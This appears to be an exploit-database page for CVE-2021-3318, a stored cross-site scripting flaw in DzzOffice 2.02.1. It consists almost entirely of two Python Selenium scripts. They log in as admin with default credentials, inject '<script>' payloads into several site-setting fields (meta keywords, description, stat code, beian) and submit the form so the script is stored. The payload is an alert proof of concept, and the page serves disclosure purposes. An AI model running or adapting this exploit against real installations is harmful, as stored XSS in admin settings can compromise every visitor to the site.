扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
# Exploit Title: DzzOffice 2.02.1 - 'Multiple' Cross-Site Scripting (XSS) # Author: @nu11secur1ty # Testing and Debugging: @nu11secur1ty, g3ck0dr1v3r # Date: 04/23/2021 # Vendor: http://www.dzzoffice.com/ # Link: https://github.com/zyx0814/dzzoffice # CVE: CVE-2021-3318 [+] Exploit Source: #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-3318 from selenium import webdriver import time import os #enter the link to the website you want to automate login. website_link="http://localhost/dzzoffice/user.php?mod=login" #enter your login username username="admin@dzzoffice.com" #enter your login password password="password" #enter the element for username input field element_for_username="email" #enter the element for password input field element_for_password="password" #enter the element for submit button element_for_submit="loginsubmit" # Dai brauzura aaa ta eba browser = webdriver.Chrome() #uncomment this line,for chrome users # Otvarai da ne vlazam s kasata browser.get((website_link)) # Run... try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element= browser.find_element_by_name(element_for_password) password_element.send_keys(password) ### Login signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() ### Exploit #time.sleep(3) element_for_natrutvanie="admin_password" laina="http://localhost/dzzoffice/admin.php?mod=appmarket&op=cloudappmarket" browser.get((laina)) ### Next level... :) os.system("python poc_login_1.py") print("payload is deployed_0...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ### os.system #!/usr/bin/python3 # Author: @nu11secur1ty # CVE-2021-3318 from selenium import webdriver import time #enter the link to the website you want to automate login. website_link="http://localhost/dzzoffice/admin.php?mod=setting" #enter your login username username="admin@dzzoffice.com" #enter your login password password="password" #enter the element for username input field element_for_username="admin_email" #enter the element for password input field element_for_password="admin_password" #enter the element for submit button element_for_submit="submit" # Dai brauzura aaa ta eba browser = webdriver.Chrome() #uncomment this line,for chrome users # Otvarai da ne vlazam s kasata browser.get((website_link)) # Run... try: username_element = browser.find_element_by_name(element_for_username) username_element.send_keys(username) password_element= browser.find_element_by_name(element_for_password) password_element.send_keys(password) ### Login signInButton = browser.find_element_by_name(element_for_submit) signInButton.click() ### Exploit time.sleep(3) element_for_natrutvanie="settingsubmit" laina="http://localhost/dzzoffice/admin.php?mod=setting" browser.get((laina)) ### Inner text... browser.execute_script("document.querySelector('[name=\"settingnew[metakeywords]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[sitebeian]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[metadescription]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") browser.execute_script("document.querySelector('[name=\"settingnew[statcode]\"]').value = '<script>alert(\"nu11secur1ty_is_here\");</script>'") time.sleep(5) # Submit exploit signInButton = browser.find_element_by_name(element_for_natrutvanie) signInButton.click() print("payload is deployed_1...\n") except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") |
体验盒子
